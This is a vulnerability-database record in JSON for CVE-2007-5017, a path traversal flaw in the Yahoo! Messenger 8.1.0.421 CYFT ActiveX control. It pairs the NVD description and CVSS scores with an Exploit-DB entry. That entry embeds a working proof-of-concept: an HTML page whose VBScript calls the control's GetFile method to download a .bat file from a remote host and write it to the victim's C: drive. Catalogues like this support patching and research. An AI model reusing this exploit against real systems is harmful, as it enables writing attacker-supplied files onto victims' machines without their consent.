{"cve": [{"lastseen": "2021-02-02T05:31:26", "description": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.", "edition": 4, "cvss3": {}, "published": "2007-09-20T21:17:00", "title": "CVE-2007-5017", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5017"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:yahoo:messenger:8.1.0.421"], "id": "CVE-2007-5017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5017", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:yahoo:messenger:8.1.0.421:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T20:54:05", "description": "Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download. CVE-2007-5017. Remote exploit for windows platform", "published": "2007-09-19T00:00:00", "type": "exploitdb", "title": "Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5017"], "modified": "2007-09-19T00:00:00", "id": "EDB-ID:4428", "href": "https://www.exploit-db.com/exploits/4428/", "sourceData": "<pre>\n<code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\"><body bgcolor=\"#E0E0E0\">-----------------------------------------------------------------------------\n <b>Yahoo! 
Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download</b>\n url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://shinnai.altervista.org\n\n <b><font color='red'>This was written for educational purposes. Use it at your own risk.\n Author will not be responsible for any damage.</font></b>\n\n Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7\n\n <b>Marked as:\n RegKey Safe for Script: False\n RegKey Safe for Init: False\n KillBitSet: False</b>\n\n From remote: depends on Internet Explorer settings\n From local: yes\n\n <b>Description:\n This control contains a \"GetFile()\" method which allows downloading, onto the\n user's PC, an arbitrary file passed as an argument.\n Remote execution depends on Internet Explorer settings, local execution\n works very well.</b>\n\n <b>greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration</b>\n-----------------------------------------------------------------------------\n<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>\n\n<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\n\n<script language='vbscript'>\n Sub tryMe\n test.GetFile \"http://www.shinnai.altervista.org/shinnai.bat\",\"c:\\\\shinnai.bat\",5,1,\"shinnai\"\n MsgBox \"Exploit completed\"\n End Sub\n</script>\n</span></span>\n</code></pre>\n\n# milw0rm.com [2007-09-19]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/4428/"}]}